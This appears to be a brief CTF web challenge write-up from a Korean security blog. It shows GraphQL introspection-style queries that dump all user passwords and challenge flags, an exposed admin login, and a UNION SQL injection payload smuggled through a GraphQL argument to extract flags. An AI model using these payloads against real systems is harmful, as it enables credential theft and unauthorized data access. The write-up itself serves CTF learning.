1. graphql injection
2. union sql injection
get admin password
{
allUsers{
username
password
}
}
login - admin:is_this_visible_to_you?
{
Challs{
id
title
description
category
author
points
flag{
chall_flag
}
}
}
Get Flag using sql injection
{
hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#"){
chall_id
}
}
'web hacking' 카테고리의 다른 글
leak data via http gzip compression (0) | 2021.09.28 |
---|---|
Weird Javascript (3) | 2021.08.29 |
SQL Injection 정리 (0) | 2020.11.08 |
TokyoWesterns CTF 2020 Web Writeup (0) | 2020.09.21 |
PHP object injection (0) | 2020.08.13 |